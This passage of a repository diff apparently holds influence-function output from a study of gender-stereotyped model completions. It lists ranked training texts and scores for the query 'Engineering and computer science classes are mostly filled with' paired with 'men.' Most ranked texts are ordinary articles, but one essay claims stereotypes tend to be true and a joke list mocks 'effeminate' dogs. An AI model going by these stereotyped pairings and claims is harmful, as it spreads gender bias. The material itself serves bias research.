to the Associated Press. + +Recently, Elon Musk and 116 other technology leaders sent a petition to the United Nations calling for new regulations on how such AI weapons are developed. The group stated that the introduction of autonomous technology would be tantamount to a “third revolution in warfare,” following the development of gunpowder and nuclear weapons. + +An AI arms race doesn’t necessarily have to be a winner-takes-all scenario, though. Putin noted that Russia did not want to see any one country “monopolize” the field, and said instead: “If we become leaders in this area, we will share this know-how with entire world, the same way we share our nuclear technologies today.” + +Update September 4th, 5:40AM ET: Elon Musk offers his cheery perspective on Twitter:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 92; Score = 3112960.0 +<|begin_of_text|>“Stereotypes” have a bad name, and everybody hates stereotypes. But what exactly is a? + +What people call “stereotypes” are what scientists call “empirical generalizations,” and they are the foundation of scientific theory. That’s what scientists do; they make generalizations. Many stereotypes are empirical generalizations with a statistical basis and thus on average tend to be true. If they are not true, they wouldn’t be stereotypes. The only problem with stereotypes and empirical generalizations is that they are not always true for all individual cases. They are generalizations, not invariant laws. There are always individual exceptions to stereotypes and empirical generalizations. The danger lies in applying the empirical generalizations to individual cases, which may or may not be exceptions. But these individual exceptions do not invalidate the generalizations. + +An observation, if true, becomes an empirical generalization until someone objects to it, and then it becomes a stereotype. For example, the statement “Men are taller than women” is an empirical generalization. It is in general true, but there are individual exceptions. There are many men who are shorter than the average woman, and there are many women who are taller than the average man, but these exceptions do not make the generalization untrue. Men on average are taller than women in every human society (and, by the way, there are evolutionary psychological explanations for this phenomenon, known as the sexual dimorphism in size, but that’s perhaps for a future post). Everybody knows this, but nobody calls it a stereotype because it is not unkind to anybody. Men in general like being taller than women, and women in general like being shorter than men. + +However, as soon as one turns this around and makes a slightly different, yet equally true, observation that “Women are fatter than men,” it becomes a stereotype because nobody, least of all women, wants to be considered fat. But it is true nonetheless; women have a higher percentage of body fat than men throughout the life course (and there are evolutionary reasons for this as well). Once again, there are numerous individual exceptions, but the generalization still holds true at the population level. + +Stereotypes and empirical generalizations are neither good nor bad, desirable nor undesirable, nor immoral. They just are. Stereotypes do not tell us how to behave or treat other people (or groups of people). Stereotypes are observations about the empirical world, not behavioral prescriptions. One may not infer how to treat people from empirical observations about them. Stereotypes +================================================================================ +Rank = 93; Score = 3096576.0 +<|begin_of_text|>By Tanja Babic, PhD + +In the modern world, success of corporations is often driven by their employees and teams. Understanding how human behaviors affect the workplace is the main objective of industrial and organizational psychology, also known as I/O psychology. I/O psychologists study factors that promote motivation, team work and productivity, as well as management practices that improve employee’s performance. There are many industrial and organizational psychologists working towards improving working conditions, however, the following 30 people were chosen based on the following criteria: + +1. Publications: Majority of the individuals on this list have outstanding publication records. These publications include articles in scientific journals, books and book chapters. + +2. Impact on industrial and organizational practices: Although academic research is an important aspect of psychology, its influence can only be assessed once ideas are put into practice and applied in a workplace. Men and women on this list have made a significant impact on modern practices and policies in a workplace. + +3. Influence on future research directions: While many researchers have published important papers in the field of industrial and organizational psychology, priority was given to those who have made a substantial change in the way in which certain theories are viewed, or those who have led the way into novel research areas. + +4. Awards and recognitions: Most psychologists on this list have been recognized for their achievements by various international professional societies, foundations and even Queen Elizabeth II + +1. Stanley Silverman + +Dr. Silverman is the dean of the Summit College and University College at the University of Akron. His area of expertise is the effect that arrogant bosses have on a workplace. He devised a new measure of arrogance called “Workplace Arrogance Scale,” which is used to determine whether managers possess arrogant tendencies. + +2. Anita Woolley + +Just like individuals, teams possess a certain level of intelligence. This concept of “collective intelligence” is the focus of Dr. Woolley’s research. She is an assistant professor of organizational behavior and theory at the Tepper School of Business at Carnegie Mellon University. One of the most interesting findings of her recent research is that team intelligence is positively correlated with the number of women on the team. This study was published in the prestigious journal Science in 2010. + +3. David Rock + +The Neuroleadership Institute was founded in order to bring together neuroscience and leadership experts and to enhance the science of leadership. The institute’s founder, Dr. David Rock, is the author of two business best-sellers and is a blogger for the Harvard Business Review, Fortune Magazine, Psychology Today and the Huffington Post. + + +================================================================================ +Rank = 94; Score = 3080192.0 +<|begin_of_text|>Ajax a short form of Asynchronous JavaScript and XML is a set of techniques used by many modern and popular web sites. This technique allows portions of a Web page to be updated without refreshing the entire page, a significant advance in the development of websites and web-based applications. For example, a site might allow you to rate a product or item by clicking on a star image. With Ajax, your vote could be registered without having to load the entire page again. In this post, we are listing down 15 Beautiful Web Designs Empowered With Ajax Techniques for your inspiration. If you like this post so please spread the word as much as possible via twitter. + +You are welcome if you want to share more web designs empowered with Ajax techniques that we have missed here and you think our readers/viewers may like. Do you want to be the first one to know the latest happenings at SmashingApps.com just subscribe to our rss feed and you can follow us on twitter as well. + +I will appreciate if you can spread the word via Digg, Stumbleupon and other social media websites, Thank you. + +BBC + +MSNBC + +White House + +Ajax Whois + +iGoogle + +Netvibes + +Pageflakes + +Protopage + +My Live + +My Yahoo + +eskobo + +Symbaloo + +Pingle + +Inbox + +Shelfari<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 95; Score = 3047424.0 +<|begin_of_text|>ABSTRACT: While much has been written about how the Federal Reserve benefits certain private parties and how it generates money out of thin air, this paper delves deeper into the operation of the Federal Reserve as an instrument of war, and its historical role as a primary enabler of armed international conflict. A comparison is done with an analogous monetary institution, the Bank of Canada, to show that the Federal Reserve is being operated differently, with war being its chief historical focus. + +The above image is licensed under a Creative Commons License. Feel free to use it. You can get a high quality image for printing here. + +This paper resulted from attempts to derive the logic of mechanisms that govern money supply, with focus on the United States. I will also assess whether or not instruments of money supply have stayed true to the logic behind their existence. And if not, I will try to derive the rationale behind their present operation. + +An Introduction to Juris Naturalis, an organic view of economics + +My perspective may be categorised as that of the Austrian School of Economics, Objectivist and Libertarian. But I would like to emphasize the role of Richard Maybury’s naturalist philosophical viewpoints in shaping my perspective. Maybury attempts to derive human laws from Judeo-Christian moral beliefs. While this is a broad subject, Maybury has distilled the essence of these moral beliefs into two laws[1] that are very relevant to inter-human relations: + +1. Do all you have agreed to do. 2. Do not encroach on other persons or their property. + +Maybury regards these laws with the same certainty as scientific principles, a concept he refers to as juris naturalis. Maybury demonstrates that adherence to or deviation from these laws results in predictable economic outcomes.[2] + +These laws are more relevant to understanding money supply than economics, mainly on the basis of what came first. Maybury demonstrates that these laws were taken for granted by the founding fathers of America, when they were drafting laws that lead to the creation of the largest “free market.” On the other hand, modern day economics is a relatively new discipline that attempts to identify patterns using a rigid but limited framework. To quote Alfred Marshall in The Principles of Economics: + +The forces to be dealt with are…so numerous, that it is best to take a few at a time…Thus we begin by isolating the primary relations of supply and demand.[3] + +Why Establishment Economics Fails + +When Alfred Marshall published his conclusions in 1890, supply and demand diagrams appeared only in a footnote,[4] despite his being an +================================================================================ +Rank = 96; Score = 3047424.0 +<|begin_of_text|>Modern computer chips handle data at the mind-blowing rate of some 10^13 bits per second. Neurons, by comparison, fire at a rate of around 100 times per second or so. And yet the brain outperforms the best computers in numerous tasks. + +One reason for this is way computations take place. In computers, calculations occur in strict pipelines, one at a time. + +In the brain, however, many calculations take place at once. Each neuron communicates with up to 1000 other neurons at any one time. And since the brain consists of billions neurons, the potential for parallel calculating is clearly huge. + +Computer scientists are well aware of this difference and have tried in many ways to mimic the brain’s massively parallel capabilities. But success has been hard to come by. + +Today, Anirban Bandyopadhyay at National Institute for Materials Science in Tsukuba, Japan, unveil a promising new approach. At the heart of their experiment is a ring-like molecule called 2,3-dichloro-5,6-dicyano-p-benzoquinone, or DDQ. + +This has an unusual property: it can exist in four different conducting states, depending on the location of trapped electrons around the ring. What’s more, it’s possible to switch the molecule from one to state to another by zapping it with voltages of various different strengths using the tip of a scanning tunnelling microscope. It’s even possible to bias the possible states that can form by placing the molecule in an electric field + +Place two DDQ molecules next to each other and it’s possible to make them connect. In fact, a single DDQ molecule can connect with between 2 and 6 neighbours, depending on its conducting state and theirs. When one molecule changes its state, the change in configuration ripples from one molecule to the next, forming and reforming circuits as it travels. + +Given all this, it’s not hard to imagine how a layer of DDQ molecules can act like a cellular automaton, with each molecule as a cell in the automaton. Roughly speaking, the rules for flipping cells from one state to another are set by the bias on the molecules and the starting state is programmed by the scanning tunnelling microscope. + +And that’s exactly what these guys have done. They’ve laid down 300 DDQ molecules on a gold substrate, setting them up as a cellular automaton. More impressive still, they’ve then initialised the system so that it “calculates” the way +================================================================================ +Rank = 97; Score = 3031040.0 +<|begin_of_text|>In the 28 years since Super Mario Bros. was released it's obviously been comprehensiely beaten, thoroughly, many thousands of times in that time by players around the world. + +But have you ever made the game beat itself? + +Advertisement + +That's what computer scientist Tom Murphy has done. At SigBovik 2013 he presented a program that "solves" how to play Super Mario Bros., or any other NES game, like it's just another kind of mathematical problem. And for those who know that SigBovik is an annual computer science conference dedicated to spoof research, hosted on 1 April every year, Murphy stresses that this is "100 percent real". + +He outlines his method in a paper,"The First Level of Super Mario Bros. is Easy with Lexicographic Orderings and Time Travel... after that it gets a little tricky", but he also presented the results in the video you can see with this story. + +Read next Super Smash Bros. Ultimate review: the best Smash ever Super Smash Bros. Ultimate review: the best Smash ever + +Lexicographic ordering is a pretty simple mathematical technique used to determine the best order a set of values should come in. + +It's most commonly used in libraries or dictionaries for arranging books and words, for instance, with the alphabet determining the order of the letters. + +Advertisement + +The NES puts out 60 frames of 2048 bytes per second, and each of these was fed into LearnFun. Everything in the NES's memory -- the buttons being pressed, the number of lives left, the score, the locations of enemies, Mario's position as coordinates, and so on -- is taken in by the LearnFun algorithm. + +PlayFun then plays the game, and uses the knowledge from LearnFun to try and increase the values it knows it has to increase, which mainly means Mario's score and how far scrolled the right Mario is in the level. "It's trying to find the sequence of inputs to make those values go up in the RAM," Murphy explains in the video. + +The results are impressive. After some tweaking, Mario plays the first level just like a real person, jumping on enemies like Goombas and hitting boxes for coins. The program even learns how to take advantage of bugs and glitches, like timing jumps so that Mario begins falling again at the exact time that he makes contact with a Goomba. Mario's invincible when he's falling, so the touch kills the Goomba, not Mario, and it gives him a further jump boost. + +Read next These +================================================================================ +Rank = 98; Score = 3031040.0 +<|begin_of_text|>The Great Math Mystery + +PBS Airdate: April 15, 2015 + +NARRATOR: We live in an age of astonishing advances: engineers can land a car-sized rover on Mars, physicists probe the essence of all matter, while we communicate wirelessly on a vast worldwide network. But underlying all of these modern wonders is something deep and mysteriously powerful. + +It's been called the language of the universe, and perhaps it's civilization's greatest achievement. Its name? Mathematics. + +But where does math come from? And why, in science, does it work so well? + +MARIO LIVIO (Author, Is God a Mathematician?): Albert Einstein wondered, “How is it possible that mathematics does so well in explaining the universe as we see it?” + +NARRATOR: Is mathematics even human? + +ELIZABETH BRANNON (Duke University, Center for Cognitive Neuroscience): There doesn't really seem to be an upper limit to the numerical abilities of animals. + +NARRATOR: And is it the key to the cosmos? + +MAX TEGMARK (Massachusetts Institute of Technology/Author, Our Mathematical Universe): Our physical world doesn't just have some mathematical properties; it has only mathematical properties. + +NARRATOR: The Great Math Mystery, next, on NOVA! + +Human beings have always looked at nature and searched for patterns. Eons ago we gazed at the stars and discovered patterns we call constellations, even coming to believe they might control our destiny. + +We've watched the days turn to night and back to day, and seasons, as they come and go, and called that pattern “time.” We see symmetrical patterns in the human body and the tiger's stripes, and build those patterns into what we create, from art to our cities. + +But what do patterns tell us? Why should the spiral shape of the nautilus shell be so similar to the spiral of a galaxy or the spiral found in a sliced open head of cabbage? + +When scientists seek to understand the patterns of our world, they often turn to a powerful tool: mathematics. They quantify their observations and use mathematical techniques to examine them, hoping to discover the underlying causes of nature's rhythms and regularities. + +And it's worked, revealing the secrets behind the elliptical orbits of the planets to the electromagnetic waves that connect our cell phones. Mathematics has even guided the way, leading us right down to the sub-atomic building blocks of matter, which raises the question, “Why does it work at all? Is there an inherent mathematical nature to reality +================================================================================ +Rank = 99; Score = 3031040.0 +<|begin_of_text|>-Fixed a bug that caused small dogs to start barking and never stop. + +-Small dogs are no longer supported, and will self-terminate within two months. + +-St. Bernard size increased 100%. + +-St. Bernard's cask will no longer contain brandy. Now contains one of four dipping sauces (ranch dressing, sweet and sour, honey mustard and barbecue). + +-Improved saliva production in certain breeds by as much as 300%. + +-Removed a rare glitch that would cause a dog's head to rotate 360 degrees when looking inquisitively at operator. + +-Dogs now regard vacuum cleaners as friends and will attempt to operate them. + +-Fixed a bug that caused dogs to incorrectly regard fecal matter as food. + +-Fixed an error that caused social interaction between dogs to occur on the wrong end. + +-Fixed an issue where some breeds would grow curly hair, making them appear effeminate and prissy. + +-Improved dog pathfinding, allowing them to better navigate to operators located at higher altitudes or behind complicated obstacles. + +-Dramatically reduced instances of autoerotic behavior in public. + +-Addressed a logic error that caused some dogs to hysterically chomp at bees. + +-Fixed a rare glitch where a dog would regard its own tail as an enemy. + +-Removed an exploit that would allow operators to duplicate their dogs endlessly. + +-Placing a small ball or toy in a dog's open mouth while it is yawning will no longer cause it to shut down. + +-Reduced bloodhound "droopiness" by 25%. + +-Fixed issues of dogs turning hostile when spoken to in a funny or scary voice. + +-Introduced fixes for three common benign situations that would cause a dog to become sexually aroused. + +-Fixed error of dog incompatibility with chocolate cake. Should greatly improve experience of being dog. + +-Fixed a bug that would cause floppy ears to flip over the wrong way, requiring an operator to reset them to their default position. + +-Dogs should no longer drag butts across carpeting in presence of operators. + +-Fixed rendering bug that caused deformed geometry on pug faces. + +-Investigated issue of pit bulls entering rings of screaming men, biting each other to death; confirmed cause as operator error. + +-Fixed vocalization issue in huskies which would cause them to utter "I love you" when trying to say "stop tormenting me." + +-Added a routine to flush loyalty cache of dogs upon death of operators, preventing documented issues of dogs waiting at train stations for 15 years. + +-Fixed a \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw_margin/query_dataset_metadata.json b/examples/openwebtext/files/scores_raw_margin/query_dataset_metadata.json new file mode 100644 index 0000000..002d99a --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/query_dataset_metadata.json @@ -0,0 +1,5 @@ +{ + "type": "Dataset", + "dataset_size": 10, + "indices": null +} \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw_margin/science.txt b/examples/openwebtext/files/scores_raw_margin/science.txt new file mode 100644 index 0000000..2fbd93b --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/science.txt @@ -0,0 +1,2096 @@ +Query Sequence: +Prompt:Engineering and computer science classes are mostly filled with; Completion: men. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 933888.0 +<|begin_of_text|>A few weeks ago I spoke on a panel at Middle of the Map Fest called “Home Grown Tech for Social Good.” One of the questions I was asked was “How do you prepare girls for sexism in the tech industry?” I tend to treat panels like Twitter, with short, succinct responses so other panelists have time to weigh in. My <= 140 character response to this question was “We don’t, we empower them.” + +But that’s not nearly enough information to cover this issue. + +I wanted to share the two stories above to demonstrate a common theme: In the workplace we often encounter awful people and terrible bosses. It’s a fact of life. Anna and Tiffany had very similar experiences with unpleasant coworkers and bosses setting them up to fail, so why were their reactions and faith in their skills so different? + +It’s because society has told Anna that styling hair is an acceptable profession for a woman. She’s never had to convince someone that she is, in fact, a hair stylist. She went to school with classes full of women. She’s never worried about her ability to mix colors correctly or leave a toner on for just the right amount of time due to her possession of ovaries. + +When she had enough of a hostile work environment, she simply moved on to a new place. Anna takes awful people and terrible bosses in her workplace in stride, because society hasn’t told her she deserves to be treated poorly in her particular workplace because of her gender. + +Society has not been so encouraging for Tiffany. She was told that computers and electronics were for boys, she attended school as an obvious and glaring minority, she had to convince people every step of the way that she is, in fact, a programmer. When her boss criticized her, yet provided no advice for improvement, she wondered if she had what it takes to be a programmer. Society has told her as a woman she lacks the ability to think logically and critically, key factors in writing code. + +Tiffany’s story is not unique. I can’t count the number of times I’ve had to convince a professional, a new acquaintance, a loan officer or another programmer that I am, in fact, a programmer. I can’t remember all the times I’ve walked into a technology meet-up or group and had the room fall silent at the arrival of a woman. I do remember feeling the pain and rejection of peers for my excitement of computers and technology, because society didn’t support girls liking those things. + +So why don’t we “prepare girls for sexism?” When a doctor +================================================================================ +Rank = 1; Score = 917504.0 +<|begin_of_text|>Ever since my university days I have observed that be it college, open source communities or the workplace, the ratio of men to women is significantly skewed. There are a couple of factors that contribute to this. Apart from lack of awareness about the opportunities available and how to make best use of them, cultural fabrics and mindsets also play an important role. All these and much more were the centre of discussion at the Grace Hopper Celebration of Women in computing conference held in Phoenix, Arizyyona from 4th to 10 October this year. As a speaker and an attendee, I consider myself fortunate to be able to see perspectives from a much closer level and do my bit to improve the situation. + +The Conference started off on the sunny morning of the 8th October 2014. It saw a variety of talks ranging from technical topics like Molecular Biophysics, Data Science, DevOps, Networks to more generic skill-building ones like Parenting in the tech world, Interview Strategies, how to make your resume stand out and many that delved into the everyday lives of a developer, quality analyst, business analyst etc. + +As a mentor in the student opportunity lab, I met many enthusiastic young women. Being a follower of the Free Software Movement and the Open Source world, I wanted to share my learning with the larger community out there. The format of my talk was different from the usual style presentation, with an intimate audience of ten people at a time. We did multiple such sessions, each spanning about 20 minutes or so. + +Initial butterflies were soon taken over by healthy discussions at my table as i told attendees about the concept of FOSS, its importance, community structure and how it was relevant for them to know about it and contribute as a student. Having so many energetic women around with a zeal to make a change and listening to their stories definitely filled me up with a lot of positive energy! + +Among the multiple sessions that happened on that day, I got a plethora of questions.. Ranging from “what exactly is open source?”, “Oh! I thought its something on github!” to “Do we need to pay for getting an open source licence?”. Answering these and clearing many similar mind blocks regarding the specifics of open source world was a very rewarding experience. + +The rest of the conference was mostly spent at the ThoughtWorks booth. We talked to a huge number of people, telling them about ThoughtWorks, what we do and what are our practices. Our “I am the next grace hopper” frame was the centre of attraction +================================================================================ +Rank = 2; Score = 905216.0 +<|begin_of_text|>The intersection of mental health care and gun control are suddenly tragically, and finally, the subject on every congressman’s lips and under discussion by dozens of state governors. But the two policy issues could not be further apart in terms of legislative remedies. Though both are complex and thorny matters, their respective roadblocks to resolution are diametrically opposite. + +The constitutional right to bear arms is nearly as old as our country but America’s mental health policy dates only from post-World War II. The 2nd amendment was ratified in 1791. Harry Truman signed the “National Mental Health Act,” into law in 1946. + +Though both issues are driven by unique interests, one constituency needs enormous investments of medical and psychological diagnostic research and a commitment to providing national and local support for overmatched families and schools educating thousands of children with special needs. On the other side of the checkbook, the gun owning citizenry is led by a well-informed private industry with seemingly limitless wealth — much of it dedicated to discouraging government legislators from authorizing restrictions. + +1 of 10 Full Screen Autoplay Close Skip Ad × What some pro-gun lawmakers are saying after Newtown View Photos In the aftermath of the shooting, a number of NRA-supported legislators have come out in support of new gun laws or signaled a willingness to budge. Here’s who said what. Caption In the aftermath of the shooting, a number of NRA-supported legislators have come out in support of new gun laws or signaled a willingness to budge. Here’s who said what. In the aftermath of the Newtown, Conn., massacre, a number of traditionally pro-gun-rights legislators have come out in support of a ban on assault rifles, or otherwise signaled they may be willing to budge on new gun laws. The NRA gives lawmakers a grade on their gun stance, which can be influential in their elections. The scale ranges from an A-plus rating (the legislator consistently votes with the NRA and makes a “vigorous effort to promote and defend the Second Amendment”) to an F, (a “true enemy of gun owners’ rights”). If any gun-control measure were to be passed, it would need significant support of NRA allies who buck the group’s wishes. Scott Olson/GETTY IMAGES Buy Photo Wait 1 second to continue. + +Those populations most deeply affected, though each well-intentioned and noble, rarely overlap. Most parents of young (mostly) men suffering from psychotic episodes struggle mightily to protect and care for their ill sons while seeking ways to integrate them into the larger community +================================================================================ +Rank = 3; Score = 835584.0 +<|begin_of_text|>It’s been relatively quiet around here lately so how about a rousing debate on race in America? + +Iraqi war veteran Colby Bohannon has founded a group called the Former Majority Association For Equality and plans to offer five scholarships for qualified male students – the only catch, they have to be at least one quarter Caucasian. When interviewed by the American Statesmen Bohannon, who says his group doesn’t take a stand for or against Affirmative Action, said he’s just not sure that white men are the majority anymore. + +Okay, NO ONE should be denied an opportunity for an education, regardless of race, religion or color. But opportunities are not equal and fair is a concept that really works best when forecasting the weather. I wonder if Bohannon has any idea of the numbers of very smart students of color who couldn’t afford to go to college or were denied admission for various reasons. Reading this story brought me right back to the discussions I had at points in my career in various newsrooms where someone told me I was ‘lucky” I was black because my resume tape would stand out. Forget the fact that I was typically one of only two people of color working in the newsroom. + +I’m not exactly certain this plan of his wasn’t hatched on a bar napkin somewhere over a pitcher of margaritas because it doesn’t seem to be real well thought-out. + +Bohannon says he’s not sure white men are the majority anymore, which, for the life of me, I can’t figure out why that’s such an earth-shattering concept. I guess because I’m not a white man. Bohannon would do himself well by snagging one of those scholarships and take a class on how to use the Internet because a quick Google search will tell you according to the latest figures, white people (not Hispanic) make up over 65 percent of the population. If we assume half of them are men, that’s still more than double the nearest group, African Americans (nearly 13 percent). I’m not even going to go into the history of race in this country and how people of color have long been discriminated against. Something tells me it would be lost on him. + +Se let’s start today’s GEM Debate… + +Should there be a scholarship for white men only? If so why? If not, why not? + +BE RESPECTFUL please.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 4; Score = 811008.0 +<|begin_of_text|>Why are more and more straight men locking lips in public – and does it mean the end of homophobia? + +When two students asked Eric Anderson, a sociology lecturer at Bath University's department of education, if he had heard of the game "gay chicken", he shook his head. "I had no clue what it was," he says. "So they showed me." The students – both men – went in to kiss each other. + +"The challenge was that whoever pulled out first was the loser," Anderson explains. "But because men are no longer afraid of this, they ended up kissing." Anderson was inspired to carry out a new research project. + +Growing up in the US, Anderson did his PhD on "the intersection of sport, masculinities and declining homophobia" after coming out at 25. + +His research subjects caught the interest of students at Bath, hence the question about "gay chicken". Anderson discovered that the game had almost died out in the UK in the last few years "because nobody ever loses", and began to consider heterosexual university students' views of kissing other men. "I started going through my students' Facebook profiles, with their permission, and was inundated with hundreds of photos of men kissing on their nights out," Anderson reports. + +He was intrigued, and decided to investigate further via formal research. He interviewed 145 students, a mixture of men studying sports-related subjects and every third man who left the library on a particular day, from two different universities, plus other male students from a sixth-form college. The results of his survey showed 89% of the polled men saying they were happy to kiss another man on the lips through friendship. And almost 40% added that they had engaged in "sustained kissing, initially for shock value, but now just for 'a laugh'." + +"I started telling people about it, but found that a lot of academics literally did not believe me," Anderson explains. "One professor excused it as'something in the water at Bath' – even though the research covered three different educational establishments. Others flatly told me that they did not believe me. From their 'adult' perspective, this action was unfathomable. They have been stamped with attitudes of acceptable behaviour as a part of their entry into adulthood, and kissing was not permitted between men when they were young. So although they had not been in students' clubs or pubs in 20 or more years, they assumed that nothing had changed. This is known as human plasticity theory; people are stamped with a belief system +================================================================================ +Rank = 5; Score = 802816.0 +<|begin_of_text|>Unless a Canadian court decides otherwise, the ski jumper with the longest flight on record at Vancouver's Olympic facility will not attend the winter Games in February. + +She is not allowed to compete. + +Olympic ski jumping is a men's-only domain. Since the first winter Games in 1924, men have been swooping down snowy ramps at 55 m.p.h. and springing into flight – human rockets hurtling chin-first, hands thrown behind, and skis angled forward. With nothing but speed and their skis to aid them, they fly the length of a football field or farther – a feat of technical genius disguised in balletic grace. + +But women can do it, too – the best often flying as far as men. + +With women now included in such formerly all-male Olympic events as boxing, wrestling, bobsleigh, and luge, the last Olympic door closed to women is ski jumping. + +But American ski jumper Lindsey Van – who set the record on the 90-meter jump when the Olympic venue opened in Vancouver, British Columbia, last year and is the reigning world champion – hasn't given up on prying that door open. It's a logical step for the 24-year-old, who, since age 7, has been soaring over Earth's mundane limits on what is possible. + +She and more than a dozen other women jumpers from Slovenia to Norway hope to legally force the addition of women's jumping before the Games open Feb. 12. Their lawsuit against the Vancouver Organizing Committee (VANOC) contends that not allowing women to jump for gold is a form of discrimination under Canadian laws that prohibit gender discrimination in government activities. + +A Canadian judge, last summer, agreed: It is discrimination. + +But her ruling concluded that while VANOC is subject to those antidiscrimination laws, it can't control the events – that's the domain of the International Olympic Committee (IOC). The IOC voted in 2006 against including women's ski jumping in 2010 because it deemed there weren't enough high-level women to create competition worthy of the Olympics. Because the IOC isn't bound by Canadian law, the judge ruled, Canada is powerless to change the program. + +So the jumpers' appeal asks Canada to refuse to hold the men's event unless both genders can compete. + +When the appeal is heard Nov. 12 and 13, it will highlight not just women's battle to wipe out the last vestige of an old-boys-club Olympic culture, but also competing demands on the Olympic ideal: + +•Allow +================================================================================ +Rank = 6; Score = 782336.0 +<|begin_of_text|>An extraordinary thing happened in the Houses of Parliament on Tuesday. A member of the seven-strong Backbench Business Committee burst out laughing at the suggestion that MPs should be allowed to debate a range of gender issues including domestic violence, suicide and premature mortality rates. + +In an age when offending the sensibilities of anti-sexism campaigners can cause Nobel laureates to be sacked and drive astrophysicists with unfortunate dress sense to tears of redemption, it’s a miracle there hasn’t been another hysterical lynching in the court of public opinion. + +At least it would be if it were a male politician caught on camera chortling at the suggestion that parliament should discuss issues like violence against women, breast cancer screening and eating disorders. + +The reason the media hasn’t grabbed hold of SniggerGate yet, is that the sniggering MP is female and the gendered problems she appears to find funny are issues that disproportionately affect men and boys. + +(You can watch the debate in full on Parliamentlive.tv's archive. Fast forward to 14:54:10.) + +On the day that Jess Phillips MP sniggered at the suggestion that men’s issues should be discussed in Parliament on International Men’s Day, another 13 men died from suicide. + +It’s not funny. Not for the men whose lives were lost and not for their friends and family. Suicide is a men’s issue and if we don’t talk about the problem, we can’t solve it. + +On the day the Labour member for Birmingham Yardley clapped her hands over her mouth to stop herself guffawing at Philip Davies MP’s request for a debate on men’s issues, more than 200 men died of cancer. + +As a nation we spend more time, money and energy trying to prevent, detect and cure female cancers in the UK – and yet men are 58pc more likely to die of cancer before the age of 65 than women. + +I don’t think that’s hilarious. Not for the men who die before their time and not for the loved ones they leave behind. Men of all classes have a lower life expectancy than women of the same background. It’s a men’s issue and like all men’s issues, we can’t solve it if we 